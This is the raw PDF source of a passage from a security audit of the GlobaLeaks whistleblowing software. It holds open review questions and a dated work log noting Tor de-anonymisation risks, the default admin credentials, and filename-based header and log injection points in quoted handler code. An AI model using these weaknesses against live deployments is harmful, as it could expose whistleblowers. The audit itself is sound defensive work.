If a user clicks one, it might de-anonymize them) Tj T* 0 Tw 2.10686 Tw (\(because of the ) Tj /F3 10 Tf (Referer ) Tj /F1 10 Tf (header and the fact of clicking the link\), especially if they are using) Tj T* 0 Tw /F4 10 Tf (tor2web) Tj /F1 10 Tf (. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (docs say it adds rel="noreferer", but is this supported by all browsers?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 435.0236 cm Q q 1 0 0 1 62.69291 375.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 4.080814 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (docs mention ) Tj /F4 10 Tf (iptables) Tj /F1 10 Tf (. Default install still allows non-Tor traffic, which may be) Tj T* 0 Tw 1.154597 Tw (dangerous. An adversary might be able to correlate requests to the ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (debian ) Tj /F1 10 Tf (repository) Tj T* 0 Tw .328221 Tw (\(not over Tor\) and Node downtime \(while installing updates\), to find the real IP address of the Node.) Tj T* 0 Tw 1.744147 Tw (Also, could ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ('s modification to ) Tj /F4 10 Tf (iptables ) Tj /F1 10 Tf (rules disable pre-existing rules the sysadmin is) Tj T* 0 Tw (relying on?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 369.0236 cm Q q 1 0 0 1 62.69291 345.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.829147 Tw 12 TL /F1 10 Tf 0 0 0 rg (The install instructions ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (offers involve downloading a shell script from ) Tj /F4 10 Tf (GitHub ) Tj /F1 10 Tf (then) Tj T* 0 Tw (running it as root. You have to trust ) Tj /F4 10 Tf (GitHub ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (SSL) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 339.0236 cm Q q 1 0 0 1 62.69291 303.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .696412 Tw (The default credentials are admin:globaleaks. I don't think you can change them without having the) Tj T* 0 Tw 1.150651 Tw (service running, which leaves a window of vulnerability. It would be better to randomly generate a) Tj T* 0 Tw (password during the install.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 297.0236 cm Q q 1 0 0 1 62.69291 273.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.661647 Tw 12 TL /F1 10 Tf 0 0 0 rg (How do ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (authors notify Node administrators of security updates? What are their) Tj T* 0 Tw (disclosure/transparency practices?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 267.0236 cm Q q 1 0 0 1 62.69291 243.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .992485 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has an ) Tj /F4 10 Tf (SMTP ) Tj /F1 10 Tf (server set up for sending notifications by default. Can't this be used for) Tj T* 0 Tw (sending spam? It's at least a single point of failure.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 237.0236 cm Q q 1 0 0 1 62.69291 201.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.321235 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (should make sure that the user is warned to use Tor ) Tj /F4 10 Tf (from an unrelated location) Tj /F1 10 Tf (. 
For) Tj T* 0 Tw .839318 Tw (example, if an employee is submitting a leak to a company's internal whistleblowing system, the IT) Tj T* 0 Tw (department can list all users who were running Tor at the time of submission to figure out who it was.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 195.0236 cm Q q 1 0 0 1 62.69291 171.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .45229 Tw (Multi-language support might leak the user's selected language through traffic analysis \(the fact that) Tj T* 0 Tw (they changed languages, or page sizes\). This could help de-anonymize the user.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 165.0236 cm Q q 1 0 0 1 62.69291 141.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.408651 Tw (Attacks de-anonymizing the THS. If the THS box is also connected to the Internet, the adversary) Tj T* 0 Tw (might be able to check an IP-address guess by seeing how well the clocks are in sync.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 135.0236 cm Q q 1 0 0 1 62.69291 99.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.304985 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (warns if the user is connected by tor2web, but not onion.to. 
It's impossible to do this) Tj T* 0 Tw 1.262927 Tw (perfectly in general \(it relies on the gateway adding headers\), but it could have a note like "make) Tj T* 0 Tw (sure you are really using Tor and not a gateway.") Tj T* ET Q Q q Q Q endstream endobj % 'R380': class PDFStream 380 0 obj % page stream << /Length 1100 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 11 Tm T* ET q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.029213 Tw 12 TL /F1 10 Tf 0 0 0 rg (A more invasive detection technique may be worth considering. For example, the ) Tj /F4 10 Tf (JavaScript ) Tj /F1 10 Tf (client) Tj T* 0 Tw (could ping ) Tj 0 0 .501961 rg (http://check.torproject.org ) Tj 0 0 0 rg (and tell the user the result.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 735.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .110651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Does hash randomization need to be enabled to prevent DoS attacks? This is documented in ) Tj 0 0 .501961 rg (Python) Tj T* 0 Tw (Documentation ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Python Issue 13703) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 711.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm Q endstream endobj % 'R381': class PDFStream 381 0 obj % page stream << /Length 10144 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix A. Work Log) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Prior to This Audit) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.347984 Tw (Least Authority had collected some auditing notes and examined the software previously as part of an) Tj T* 0 Tw .814985 Tw (Architectural Design Review document. 
This Report and Work Log are specific to only the recent code /) Tj T* 0 Tw (implementation audit work occurring in February, 2014.) Tj T* ET Q Q q 1 0 0 1 62.69291 642.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-01-28 to 2014-02-03) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The first week of audit work followed this rough process:) Tj T* ET Q Q q 1 0 0 1 62.69291 618.0236 cm Q q 1 0 0 1 62.69291 618.0236 cm Q q 1 0 0 1 62.69291 606.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Contacted the development team about audit kick off.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 600.0236 cm Q q 1 0 0 1 62.69291 588.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Checked out codebases and set up local test environments.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 582.0236 cm Q q 1 0 0 1 62.69291 570.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Played with the UI, while brainstorming about attack surfaces and threat models.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 564.0236 cm Q q 1 0 0 1 62.69291 552.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Read design documentation, along with some previous audits and related projects.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 546.0236 cm Q q 1 0 0 1 62.69291 534.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Examined the codebase layout, dependencies, and large scale organization.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 534.0236 cm Q q 1 0 0 1 62.69291 504.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-04) Tj T* ET Q Q q 1 0 0 1 62.69291 492.0236 cm Q q 1 0 0 1 62.69291 492.0236 cm Q q 1 0 0 1 62.69291 468.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .895542 Tw (How does the client get data from the backend? Does it talk to a database directly? Answer: no, it) Tj T* 0 Tw (sends REST requests which go to handlers.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 462.0236 cm Q q 1 0 0 1 62.69291 450.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Began to systematically document each dependency and its purpose.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 444.0236 cm Q q 1 0 0 1 62.69291 432.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Read over all of the ) Tj /F3 10 Tf (login_* ) Tj /F1 10 Tf (methods to understand authentication basics.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 426.0236 cm Q q 1 0 0 1 62.69291 414.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Read the ) Tj /F4 10 Tf (Storm ) Tj /F1 10 Tf (tutorial enough to understand the ) Tj /F3 10 Tf (login_* ) Tj /F1 10 Tf (methods.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 408.0236 cm Q q 1 0 0 1 62.69291 372.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 2.163976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Noticed that ) Tj /F3 10 Tf (globaleaks.settings.transact ) Tj /F1 10 Tf (decorated functions all run on a thread pool.) Tj T* 0 Tw .403876 Tw (This seems prone to race condition problems, and we should verify if this is a safe practice. \(Even if) Tj T* 0 Tw (not exploitable it may be bug-prone.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 372.0236 cm Q q 1 0 0 1 62.69291 342.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-05) Tj T* ET Q Q q 1 0 0 1 62.69291 330.0236 cm Q q 1 0 0 1 62.69291 330.0236 cm Q q 1 0 0 1 62.69291 306.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .086136 Tw 12 TL /F1 10 Tf 0 0 0 rg (Checked the results of ) Tj /F4 10 Tf (dieharder ) Tj /F1 10 Tf (tests on the random number generator. It passes diehard_birthdays) Tj T* 0 Tw (with a p-value of 0.56696925. The generator is too slow for the rest of the tests, so I'm stopping it.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 300.0236 cm Q q 1 0 0 1 62.69291 240.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm .57811 Tw 12 TL /F1 10 Tf 0 0 0 rg (What's the runtime process structure of the backend? We run with ) Tj /F4 10 Tf (strace ) Tj /F1 10 Tf (to follow a simple request) Tj T* 0 Tw 1.373735 Tw (for the main page. There's a main Python process, another that reads a ) Tj /F4 10 Tf (SQLite ) Tj /F1 10 Tf (DB, another that) Tj T* 0 Tw 1.074269 Tw (seems to be periodically firing off temporary processes and waiting \(both that and the temporaries) Tj T* 0 Tw 2.910651 Tw (wait for something that doesn't happen\). The main process sets up a thread area and loads) Tj T* 0 Tw /F4 10 Tf (pthreads) Tj /F1 10 Tf (. All these processes read and write "x", to sync up?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 234.0236 cm Q q 1 0 0 1 62.69291 210.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.915976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated the use of ) Tj /F3 10 Tf (Random.atfork\(\)) Tj /F1 10 Tf (. Inspected ) Tj /F3 10 Tf (dump_file_fs\(\)) Tj /F1 10 Tf (: it doesn't have any) Tj T* 0 Tw (side-effects which could racily interface with the other threads.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 204.0236 cm Q q 1 0 0 1 62.69291 192.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Looked for discrepancies between client-side and server-side logic.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 186.0236 cm Q q 1 0 0 1 62.69291 162.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 4.578555 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in Issue F.\) What is "Auth temporary disabled, just Tip_id and File_id required" in) Tj T* 0 Tw /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (. Does this allow whistleblowers to download the files they submit?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 156.0236 cm Q q 1 0 0 1 62.69291 81.22389 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 59.79973 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 23.79973 cm q BT 1 0 0 1 0 38 Tm 1.259988 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue G\) Filenames are double-escaped. If you upload a file with a quote in it, it will) Tj T* 0 Tw .274147 Tw (show up like ) Tj /F3 10 Tf (test%22%20quotewithspace) Tj /F1 10 Tf (. Is the percent encoding being done intentionally, or is) Tj T* 0 Tw 2.093516 Tw (it just not being removed? When this bug is fixed, it will introduce a header injection attack. In) Tj T* 0 Tw /F3 10 Tf (handlers/files.py) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 23 17.79973 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .825386 0 0 .825386 0 0 cm q 1 0 0 1 6.6 7.996256 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 516 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (%s) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (rfile) Tj ([) Tj .729412 .129412 .129412 rg ('name') Tj 0 0 0 rg (]\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q endstream endobj % 'R382': class PDFStream 382 0 obj % page stream << /Length 10999 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 709.5775 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 42.44617 Tm T* ET q 1 0 0 1 23 40.44617 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (And in ) Tj /F3 10 Tf (handlers/collection.py) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 23 34.44617 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .771673 0 0 .771673 0 0 cm q 1 0 0 1 6.6 8.55284 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 552 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (set_header) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Disposition') Tj 0 0 0 rg (,) Tj .729412 .129412 .129412 rg ('attachment; filename=) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (opts) Tj ([) Tj .729412 .129412 .129412 rg ('filename') Tj 0 0 0 rg (]) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (') Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (') Tj 0 0 0 rg (\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 15 cm Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Escaping should always happen "on the way out" in a specific context, not "on the way in.") Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 703.5775 cm Q q 1 0 0 1 62.69291 679.5775 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .563828 Tw 12 TL /F1 10 Tf 0 0 0 rg (There is MD5 code in ) Tj /F3 10 Tf (app/scripts/vendor/md5.js) Tj /F1 10 Tf (. What is it used for? \(Answer: nothing. The) Tj T* 0 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers will remove it.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 673.5775 cm Q q 1 0 0 1 62.69291 661.5775 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Noticed ) Tj /F3 10 Tf (class) Tj ( ) Tj (RTipInstance ) Tj /F1 10 Tf (has an inaccurate doc comment.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 655.5775 cm Q q 1 0 0 1 62.69291 595.5775 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.458735 Tw 12 TL /F1 10 Tf 0 0 0 rg (The backend sends to the client absolute times in the future for expiration, and the client checks) Tj T* 0 Tw .683828 Tw (them against its own clock. \() Tj /F3 10 Tf (app/scripts/services.js ) Tj /F1 10 Tf (lines 67, 27-28, 35\) This may allow an) Tj T* 0 Tw .20811 Tw (attacker to make the client keep its session open longer than expected. Can an attacker exploit this?) Tj T* 0 Tw 1.02683 Tw (Does the server check expiry times too? Yes, it looks like it does. Does the server rely on its ) Tj /F4 10 Tf (own) Tj T* 0 Tw /F1 10 Tf (local clock not to jump? \(Attackers can violate that, in many practical cases.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 589.5775 cm Q q 1 0 0 1 62.69291 528.7441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45.83337 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 21.83337 cm q BT 1 0 0 1 0 26 Tm 1.14748 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue I\) In ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (, the following code appears. Can an) Tj T* 0 Tw 1.033555 Tw (attacker, with control over the file name, create fake log entries? The GlobaLeaks developers said) Tj T* 0 Tw (they wanted to have a more robust logging system \(for incident response\) in the future.) Tj T* ET Q Q q 1 0 0 1 23 15.83337 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .747356 0 0 .747356 0 0 cm q 1 0 0 1 6.6 8.831132 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 570 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (err) Tj (\() Tj .729412 .129412 .129412 rg ("Unable to commit new InternalFile ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (: ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj (original_fname) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj .729412 .129412 .129412 rg ('utf-8') Tj 0 0 0 rg (\),) Tj ( ) Tj (excep) Tj (\)\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 522.7441 cm Q q 1 0 0 1 62.69291 474.7441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .25408 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is now Issue H\) If a WB uploads a file, then closes the tab, the file will continue to exist on disk) Tj T* 0 Tw .053798 Tw (\(for how long?\) in ) Tj /F4 10 Tf (plain text) Tj /F1 10 Tf (, even when it is being sent to a receiver with a public key. A possible, but) Tj T* 0 Tw 2.590697 Tw (maybe bad, solution: Do the GPG encryption in JavaScript. I think the "Final Step" anonymity) Tj T* 0 Tw (warning/agreement should be required ) Tj 